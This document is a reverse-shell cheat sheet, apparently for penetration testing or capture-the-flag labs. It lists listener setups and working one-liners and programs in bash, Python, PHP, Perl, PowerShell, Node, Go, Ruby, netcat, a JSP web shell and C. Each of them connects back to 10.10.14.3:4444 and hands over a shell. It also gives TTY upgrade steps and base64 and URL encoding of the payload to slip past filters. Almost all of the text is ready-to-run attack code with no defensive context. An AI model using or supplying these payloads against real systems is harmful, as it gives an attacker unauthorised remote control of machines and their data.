Reverse Shells (All)

# Netcat
nc -lvnp 4444

# Ncat (Windows-friendly)
ncat -lnvp 4444

# Metasploit multi/handler
use exploit/multi/handler
set payload linux/x64/shell_reverse_tcp
set LHOST <ip>
set LPORT 4444
run

bash -i >& /dev/tcp/10.10.14.3/4444 0>&1

bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'

exec 5<>/dev/tcp/10.10.14.3/4444;cat <&5 | while read line; do $line 2>&5 >&5; done

busybox nc 10.10.14.3 4444 -e /bin/sh

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.14.3",4444));[os.dup2(s.fileno(),fd) for fd in(0,1,2)];pty.spawn("/bin/bash")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("10.10.14.3",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

<?php
$s=fsockopen("10.10.14.3",4444);
shell_exec("/bin/bash -i <&3 >&3 2>&3");
?>

perl -e 'use Socket;$i="10.10.14.3";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.3',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

powershell -EncodedCommand <base64>

echo -n "payload" | iconv -t UTF-16LE | base64 -w 0

node -e "const net=require('net'),cp=require('child_process');const s=net.connect(4444,'10.10.14.3');s.on('connect',()=>{cp.spawn('/bin/sh',[],{stdio:[s,s,s]})});"

package main
import("net";"os/exec")
func main(){
 c,_:=net.Dial("tcp","10.10.14.3:4444")
 cmd:=exec.Command("/bin/sh")
 cmd.Stdin,cmd.Stdout,cmd.Stderr=c,c,c
 cmd.Run()
}

GOOS=linux GOARCH=amd64 go build shell.go

ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh 10.10.14.3 4444

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.3 4444 >/tmp/f

ncat --ssl 10.10.14.3 4444 -e /bin/bash

<%@ page import="java.io.*,java.net.*"%>
<%
String host="10.10.14.3";
int port=4444;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(), pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(), so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();
  Thread.sleep(50);
  try { p.exitValue(); break; } catch (Exception e){}
}
p.destroy(); s.close();
%>

#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
int main(){
 int s=socket(AF_INET,SOCK_STREAM,0);
 struct sockaddr_in sa; sa.sin_family=AF_INET; sa.sin_port=htons(4444);
 sa.sin_addr.s_addr=inet_addr("10.10.14.3");
 connect(s,(struct sockaddr *)&sa,sizeof(sa));
 dup2(s,0); dup2(s,1); dup2(s,2);
 execl("/bin/sh","sh",NULL);
}

gcc shell.c -o shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty raw -echo; fg
reset

[Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8

# Base64 encode
echo "bash -i >& /dev/tcp/10.10.14.3/4444 0>&1" | base64

# URL encode (Burp or Python)
python3 -c "import urllib.parse;print(urllib.parse.quote('bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'))"